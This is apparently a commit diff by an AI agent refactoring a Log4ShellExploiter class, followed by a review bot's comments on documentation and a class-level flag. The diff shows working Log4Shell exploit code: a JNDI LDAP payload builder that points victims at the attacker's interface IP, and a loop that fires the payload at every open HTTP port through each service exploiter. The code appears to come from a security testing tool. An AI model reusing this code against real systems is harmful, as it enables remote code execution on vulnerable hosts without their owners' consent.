Agent: remove unused upload_monkey() and rename _trigger_exploit
parent
7bace927f8
commit
0cd6b1e616
|
@ -84,26 +84,6 @@ class Log4ShellExploiter(WebRCE):
|
||||||
# If java class was downloaded it means that victim is vulnerable
|
# If java class was downloaded it means that victim is vulnerable
|
||||||
return Log4ShellExploiter.HTTPHandler.class_downloaded
|
return Log4ShellExploiter.HTTPHandler.class_downloaded
|
||||||
|
|
||||||
def _trigger_exploit(self):
|
|
||||||
# Try to exploit all services,
|
|
||||||
# because we don't know which services are running and on which ports
|
|
||||||
open_ports = [
|
|
||||||
int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
|
|
||||||
]
|
|
||||||
for exploit in get_log4shell_service_exploiters():
|
|
||||||
for port in open_ports:
|
|
||||||
exploit.trigger_exploit(self.build_ldap_payload(), self.host, port)
|
|
||||||
|
|
||||||
# Wait for request
|
|
||||||
sleep(Log4ShellExploiter.REQUEST_TO_VICTIM_TIME)
|
|
||||||
|
|
||||||
if Log4ShellExploiter.HTTPHandler.class_downloaded:
|
|
||||||
self.exploit_info["vulnerable_service"] = {
|
|
||||||
"service_name": exploit.service_name,
|
|
||||||
"port": port,
|
|
||||||
}
|
|
||||||
return
|
|
||||||
|
|
||||||
def build_ldap_payload(self):
|
def build_ldap_payload(self):
|
||||||
interface_ip = get_interface_to_target(self.host.ip_addr)
|
interface_ip = get_interface_to_target(self.host.ip_addr)
|
||||||
return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}"
|
return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}"
|
||||||
|
@ -132,11 +112,25 @@ class Log4ShellExploiter(WebRCE):
|
||||||
else:
|
else:
|
||||||
return build_exploit_bytecode(exploit_command, WINDOWS_EXPLOIT_TEMPLATE_PATH)
|
return build_exploit_bytecode(exploit_command, WINDOWS_EXPLOIT_TEMPLATE_PATH)
|
||||||
|
|
||||||
def upload_monkey(self, url, commands=None):
|
|
||||||
pass
|
|
||||||
|
|
||||||
def exploit(self, url, command):
|
def exploit(self, url, command):
|
||||||
pass
|
# Try to exploit all services,
|
||||||
|
# because we don't know which services are running and on which ports
|
||||||
|
open_ports = [
|
||||||
|
int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
|
||||||
|
]
|
||||||
|
for exploit in get_log4shell_service_exploiters():
|
||||||
|
for port in open_ports:
|
||||||
|
exploit.trigger_exploit(self.build_ldap_payload(), self.host, port)
|
||||||
|
|
||||||
|
# Wait for request
|
||||||
|
sleep(Log4ShellExploiter.REQUEST_TO_VICTIM_TIME)
|
||||||
|
|
||||||
|
if Log4ShellExploiter.HTTPHandler.class_downloaded:
|
||||||
|
self.exploit_info["vulnerable_service"] = {
|
||||||
|
"service_name": exploit.service_name,
|
||||||
|
"port": port,
|
||||||
|
}
|
||||||
|
return
|
||||||
|
|
||||||
class HTTPHandler(http.server.BaseHTTPRequestHandler):
|
class HTTPHandler(http.server.BaseHTTPRequestHandler):
|
||||||
|
|
||||||
|
|
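Review bot: The new body of `exploit(self, url, command)` uses neither `url` nor `command` and reports its result only through the class-level flag `Log4ShellExploiter.HTTPHandler.class_downloaded`, yet the method has no docstring saying so. I would add one along the lines of `"""Send the LDAP payload to every open HTTP port through each service exploiter; url and command are unused here (apparently kept to match the WebRCE interface)."""`. A comment above `if Log4ShellExploiter.HTTPHandler.class_downloaded:` should also state that the `service_name` and `port` written to `exploit_info["vulnerable_service"]` belong to whichever attempt was in flight when the flag was observed, so a callback that arrives after `REQUEST_TO_VICTIM_TIME` ends up attributed to a later service or port in the report. Because the flag lives on the class rather than the instance, a value left `True` by an earlier run would presumably match the very first attempt unless it is reset somewhere outside this hunk, which is worth confirming and noting in the same comment.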